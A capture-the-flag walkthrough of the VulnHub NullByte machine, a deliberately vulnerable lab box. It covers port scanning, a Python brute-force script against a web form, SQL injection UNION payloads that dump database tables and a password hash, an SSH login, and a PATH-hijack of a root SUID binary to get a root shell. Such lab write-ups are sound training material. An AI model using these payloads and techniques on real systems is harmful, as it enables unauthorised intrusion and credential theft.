VulnHub : NullByte
26 June, 2021
Machine Link: https://www.vulnhub.com/entry/nullbyte-1,126/
Starting off with an nmap scan
$ sudo nmap -A -sC -sV -O -p 1-65535 192.168.110.101
Starting Nmap 7.91 ( https://nmap.org )
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.110.101
Host is up (0.00090s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Null Byte 00 - level 1
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 37492/udp status
| 100024 1 39222/udp6 status
| 100024 1 39668/tcp6 status
|_ 100024 1 59473/tcp status
777/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 1024 16:30:13:d9:d5:55:36:e8:1b:b7:d9:ba:55:2f:d7:44 (DSA)
| 2048 29:aa:7d:2e:60:8b:a6:a1:c2:bd:7c:c8:bd:3c:f4:f2 (RSA)
| 256 60:06:e3:64:8f:8a:6f:a7:74:5a:8b:3f:e1:24:93:96 (ECDSA)
|_ 256 bc:f7:44:8d:79:6a:19:48:76:a3:e2:44:92:dc:13:a2 (ED25519)
59473/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:48:A2:FC (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.90 ms 192.168.110.101
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.20 seconds
Running gobuster against the website with the common wordlist revealed two paths
/uploads (Status: 200) [Size: 113]
/phpmyadmin (Status: 200) [Size: 9123]
The root page had a gif, so I ran it through the exiftool and found a comment
$ exiftool main.gif
ExifTool Version Number : 12.26
File Name : main.gif
Directory : .
File Size : 16 KiB
File Modification Date/Time : 2015:08:01 22:09:30+05:30
File Access Date/Time : 2021:06:26 18:35:56+05:30
File Inode Change Date/Time : 2021:06:26 18:35:56+05:30
File Permissions : -rw-r--r--
File Type : GIF
File Type Extension : gif
MIME Type : image/gif
GIF Version : 89a
Image Width : 235
Image Height : 302
Has Color Map : No
Color Resolution Depth : 8
Bits Per Pixel : 1
Background Color : 0
Comment : P-): kzMb5nVYJw
Image Size : 235x302
Megapixels : 0.071
Turns out this is a path which leads to a password input page. There was also an HTML comment on that page
<!-- this form isn't connected to mysql, password ain't that complex --!>
My first thought was that if it is a harcoded password, and the input and password are being compared using PHP's strcmp then it could be bypassed using these techniques but it didn't work. So I resorted to brute forcing using the famous rockyou list. I automated this using a small python script
import requests
import sys
for word2 in open(sys.argv[1]):
word = word2.split('\n')[0]
r = requests.post('http://192.168.110.101/kzMb5nVYJw/index.php', data={'key':word})
if 'invalid key' not in r.text:
print(word)
break
And I found the key
# python3 exp.py wordlists/rockyou.txt
elite
The next screen was another form and it looked like it was vulnerable to SQL injection
# curl "http://192.168.110.101/kzMb5nVYJw/420search.php?usrtosearch=%22+OR+1+%3D+1+--+-"
EMP ID :1 <br> EMP NAME : ramses <br> EMP POSITION : <br> --------------------------------<br>EMP ID :2 <br> EMP NAME : isis <br> EMP POSITION : employee <br> --------------------------------<br>Fetched data successfully
Using the following query, I was able to retrieve the list of all tables
" OR 1 = 1 UNION ALL SELECT TABLE_SCHEMA, TABLE_TYPE, TABLE_NAME FROM information_schema.tables WHERE TABLE_TYPE='BASE TABLE'-- -
EMP ID :1
EMP NAME : ramses
EMP POSITION :
--------------------------------
EMP ID :2
EMP NAME : isis
EMP POSITION : employee
--------------------------------
EMP ID :mysql
EMP NAME : BASE TABLE
EMP POSITION : columns_priv
--------------------------------
EMP ID :mysql
EMP NAME : BASE TABLE
EMP POSITION : db
--------------------------------
EMP ID :mysql
EMP NAME : BASE TABLE
EMP POSITION : event
--------------------------------
EMP ID :mysql
EMP NAME : BASE TABLE
EMP POSITION : func
--------------------------------
EMP ID :mysql
EMP NAME : BASE TABLE
EMP POSITION : general_log
--------------------------------
EMP ID :mysql
EMP NAME : BASE TABLE
EMP POSITION : help_category
--------------------------------
EMP ID :mysql
EMP NAME : BASE TABLE
EMP POSITION : help_keyword
--------------------------------
EMP ID :mysql
EMP NAME : BASE TABLE
EMP POSITION : help_relation
--------------------------------
EMP ID :mysql
EMP NAME : BASE TABLE
EMP POSITION : help_topic
--------------------------------
EMP ID :mysql
EMP NAME : BASE TABLE
EMP POSITION : host
--------------------------------
EMP ID :mysql
EMP NAME : BASE TABLE
EMP POSITION : ndb_binlog_index
--------------------------------
EMP ID :mysql
EMP NAME : BASE TABLE
EMP POSITION : plugin
--------------------------------
EMP ID :mysql
EMP NAME : BASE TABLE
EMP POSITION : proc
--------------------------------
EMP ID :mysql
EMP NAME : BASE TABLE
EMP POSITION : procs_priv
--------------------------------
EMP ID :mysql
EMP NAME : BASE TABLE
EMP POSITION : proxies_priv
--------------------------------
EMP ID :mysql
EMP NAME : BASE TABLE
EMP POSITION : servers
--------------------------------
EMP ID :mysql
EMP NAME : BASE TABLE
EMP POSITION : slow_log
--------------------------------
EMP ID :mysql
EMP NAME : BASE TABLE
EMP POSITION : tables_priv
--------------------------------
EMP ID :mysql
EMP NAME : BASE TABLE
EMP POSITION : time_zone
--------------------------------
EMP ID :mysql
EMP NAME : BASE TABLE
EMP POSITION : time_zone_leap_second
--------------------------------
EMP ID :mysql
EMP NAME : BASE TABLE
EMP POSITION : time_zone_name
--------------------------------
EMP ID :mysql
EMP NAME : BASE TABLE
EMP POSITION : time_zone_transition
--------------------------------
EMP ID :mysql
EMP NAME : BASE TABLE
EMP POSITION : time_zone_transition_type
--------------------------------
EMP ID :mysql
EMP NAME : BASE TABLE
EMP POSITION : user
--------------------------------
EMP ID :performance_schema
EMP NAME : BASE TABLE
EMP POSITION : cond_instances
--------------------------------
EMP ID :performance_schema
EMP NAME : BASE TABLE
EMP POSITION : events_waits_current
--------------------------------
EMP ID :performance_schema
EMP NAME : BASE TABLE
EMP POSITION : events_waits_history
--------------------------------
EMP ID :performance_schema
EMP NAME : BASE TABLE
EMP POSITION : events_waits_history_long
--------------------------------
EMP ID :performance_schema
EMP NAME : BASE TABLE
EMP POSITION : events_waits_summary_by_instance
--------------------------------
EMP ID :performance_schema
EMP NAME : BASE TABLE
EMP POSITION : events_waits_summary_by_thread_by_event_name
--------------------------------
EMP ID :performance_schema
EMP NAME : BASE TABLE
EMP POSITION : events_waits_summary_global_by_event_name
--------------------------------
EMP ID :performance_schema
EMP NAME : BASE TABLE
EMP POSITION : file_instances
--------------------------------
EMP ID :performance_schema
EMP NAME : BASE TABLE
EMP POSITION : file_summary_by_event_name
--------------------------------
EMP ID :performance_schema
EMP NAME : BASE TABLE
EMP POSITION : file_summary_by_instance
--------------------------------
EMP ID :performance_schema
EMP NAME : BASE TABLE
EMP POSITION : mutex_instances
--------------------------------
EMP ID :performance_schema
EMP NAME : BASE TABLE
EMP POSITION : performance_timers
--------------------------------
EMP ID :performance_schema
EMP NAME : BASE TABLE
EMP POSITION : rwlock_instances
--------------------------------
EMP ID :performance_schema
EMP NAME : BASE TABLE
EMP POSITION : setup_consumers
--------------------------------
EMP ID :performance_schema
EMP NAME : BASE TABLE
EMP POSITION : setup_instruments
--------------------------------
EMP ID :performance_schema
EMP NAME : BASE TABLE
EMP POSITION : setup_timers
--------------------------------
EMP ID :performance_schema
EMP NAME : BASE TABLE
EMP POSITION : threads
--------------------------------
EMP ID :phpmyadmin
EMP NAME : BASE TABLE
EMP POSITION : pma__bookmark
--------------------------------
EMP ID :phpmyadmin
EMP NAME : BASE TABLE
EMP POSITION : pma__column_info
--------------------------------
EMP ID :phpmyadmin
EMP NAME : BASE TABLE
EMP POSITION : pma__designer_coords
--------------------------------
EMP ID :phpmyadmin
EMP NAME : BASE TABLE
EMP POSITION : pma__favorite
--------------------------------
EMP ID :phpmyadmin
EMP NAME : BASE TABLE
EMP POSITION : pma__history
--------------------------------
EMP ID :phpmyadmin
EMP NAME : BASE TABLE
EMP POSITION : pma__navigationhiding
--------------------------------
EMP ID :phpmyadmin
EMP NAME : BASE TABLE
EMP POSITION : pma__pdf_pages
--------------------------------
EMP ID :phpmyadmin
EMP NAME : BASE TABLE
EMP POSITION : pma__recent
--------------------------------
EMP ID :phpmyadmin
EMP NAME : BASE TABLE
EMP POSITION : pma__relation
--------------------------------
EMP ID :phpmyadmin
EMP NAME : BASE TABLE
EMP POSITION : pma__savedsearches
--------------------------------
EMP ID :phpmyadmin
EMP NAME : BASE TABLE
EMP POSITION : pma__table_coords
--------------------------------
EMP ID :phpmyadmin
EMP NAME : BASE TABLE
EMP POSITION : pma__table_info
--------------------------------
EMP ID :phpmyadmin
EMP NAME : BASE TABLE
EMP POSITION : pma__table_uiprefs
--------------------------------
EMP ID :phpmyadmin
EMP NAME : BASE TABLE
EMP POSITION : pma__tracking
--------------------------------
EMP ID :phpmyadmin
EMP NAME : BASE TABLE
EMP POSITION : pma__userconfig
--------------------------------
EMP ID :phpmyadmin
EMP NAME : BASE TABLE
EMP POSITION : pma__usergroups
--------------------------------
EMP ID :phpmyadmin
EMP NAME : BASE TABLE
EMP POSITION : pma__users
--------------------------------
EMP ID :seth
EMP NAME : BASE TABLE
EMP POSITION : users
--------------------------------
Fetched data successfully
Looks like users & seth would be worth looking into. Using the following query I retrieved the columns
" OR 1 = 1 UNION ALL SELECT COLUMN_NAME, table_schema, TABLE_NAME FROM information_schema.columns WHERE TABLE_NAME='users'-- -
EMP ID :1
EMP NAME : ramses
EMP POSITION :
--------------------------------
EMP ID :2
EMP NAME : isis
EMP POSITION : employee
--------------------------------
EMP ID :id
EMP NAME : seth
EMP POSITION : users
--------------------------------
EMP ID :user
EMP NAME : seth
EMP POSITION : users
--------------------------------
EMP ID :pass
EMP NAME : seth
EMP POSITION : users
--------------------------------
EMP ID :position
EMP NAME : seth
EMP POSITION : users
--------------------------------
Fetched data successfully
Found what looked like a base64 encoded password for ramses
" OR 1 = 1 UNION ALL SELECT id,user,pass FROM seth.users-- -
EMP ID :1
EMP NAME : ramses
EMP POSITION :
--------------------------------
EMP ID :2
EMP NAME : isis
EMP POSITION : employee
--------------------------------
EMP ID :1
EMP NAME : ramses
EMP POSITION : YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE
--------------------------------
EMP ID :2
EMP NAME : isis
EMP POSITION : --not allowed--
--------------------------------
Fetched data successfully
# echo -n "YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE" | base64 --decode
c6d6bd7ebf806f43c76acc3681703b81
This was an MD5 hash of omega
I was able to login as ramses using the password
# ssh ramses@192.168.110.101 -p 777
ramses@192.168.110.101's password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug 2 01:38:58 2015 from 192.168.1.109
ramses@NullByte:~$ whoami
ramses
ramses@NullByte:~$ id
uid=1002(ramses) gid=1002(ramses) groups=1002(ramses)
ramses@NullByte:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
messagebus:x:104:111::/var/run/dbus:/bin/false
avahi:x:105:112:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
Debian-exim:x:106:114::/var/spool/exim4:/bin/false
statd:x:107:65534::/var/lib/nfs:/bin/false
colord:x:108:117:colord colour management daemon,,,:/var/lib/colord:/bin/false
sshd:x:109:65534::/var/run/sshd:/usr/sbin/nologin
saned:x:110:119::/var/lib/saned:/bin/false
hplip:x:111:7:HPLIP system user,,,:/var/run/hplip:/bin/false
bob:x:1000:1000:bob,,,:/home/bob:/bin/bash
eric:x:1001:1001:,,,:/home/eric:/bin/bash
mysql:x:112:120:MySQL Server,,,:/nonexistent:/bin/false
ramses:x:1002:1002:,,,:/home/ramses:/bin/bash
I was able to find an SUID binary inside /var/www/backup
ramses@NullByte:/var/www/backup$ ls -ltrha
total 24K
drwxr-xr-x 4 root root 4.0K Aug 2 2015 ..
-rwsr-xr-x 1 root root 4.9K Aug 2 2015 procwatch
-rw-r--r-- 1 root root 28 Aug 2 2015 readme.txt
drwxrwxrwx 2 root root 4.0K Jun 27 07:30 .
ramses@NullByte:/var/www/backup$ cat readme.txt
I have to fix this mess...
ramses@NullByte:/var/www/backup$ ./procwatch
PID TTY TIME CMD
21983 pts/0 00:00:00 procwatch
21984 pts/0 00:00:00 sh
21985 pts/0 00:00:00 ps
It looked like it was just executing ps as root, so the first thought I had was that if the whole path /bin/ps or /usr/bin/ps etc is not I used I can hijack the ps command to run a shell as root. And it worked!
ramses@NullByte:/var/www/backup$ echo "/bin/sh" > ps
ramses@NullByte:/var/www/backup$ chmod 777 ps
ramses@NullByte:/var/www/backup$ PATH=.:$PATH ./procwatch
# id
uid=1002(ramses) gid=1002(ramses) euid=0(root) groups=1002(ramses)
# whoami
root
# cd /root
# ls
proof.txt
# cat proof.txt
adf11c7a9e6523e630aaf3b9b7acb51d
It seems that you have pwned the box, congrats.
Now you done that I wanna talk with you. Write a walk & mail at
xly0n@sigaint.org attach the walk and proof.txt
If sigaint.org is down you may mail at nbsly0n@gmail.com
USE THIS PGP PUBLIC KEY
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: BCPG C# v1.6.1.0
mQENBFW9BX8BCACVNFJtV4KeFa/TgJZgNefJQ+fD1+LNEGnv5rw3uSV+jWigpxrJ
Q3tO375S1KRrYxhHjEh0HKwTBCIopIcRFFRy1Qg9uW7cxYnTlDTp9QERuQ7hQOFT
e4QU3gZPd/VibPhzbJC/pdbDpuxqU8iKxqQr0VmTX6wIGwN8GlrnKr1/xhSRTprq
Cu7OyNC8+HKu/NpJ7j8mxDTLrvoD+hD21usssThXgZJ5a31iMWj4i0WUEKFN22KK
+z9pmlOJ5Xfhc2xx+WHtST53Ewk8D+Hjn+mh4s9/pjppdpMFUhr1poXPsI2HTWNe
YcvzcQHwzXj6hvtcXlJj+yzM2iEuRdIJ1r41ABEBAAG0EW5ic2x5MG5AZ21haWwu
Y29tiQEcBBABAgAGBQJVvQV/AAoJENDZ4VE7RHERJVkH/RUeh6qn116Lf5mAScNS
HhWTUulxIllPmnOPxB9/yk0j6fvWE9dDtcS9eFgKCthUQts7OFPhc3ilbYA2Fz7q
m7iAe97aW8pz3AeD6f6MX53Un70B3Z8yJFQbdusbQa1+MI2CCJL44Q/J5654vIGn
XQk6Oc7xWEgxLH+IjNQgh6V+MTce8fOp2SEVPcMZZuz2+XI9nrCV1dfAcwJJyF58
kjxYRRryD57olIyb9GsQgZkvPjHCg5JMdzQqOBoJZFPw/nNCEwQexWrgW7bqL/N8
TM2C0X57+ok7eqj8gUEuX/6FxBtYPpqUIaRT9kdeJPYHsiLJlZcXM0HZrPVvt1HU
Gms=
=PiAQ
-----END PGP PUBLIC KEY BLOCK-----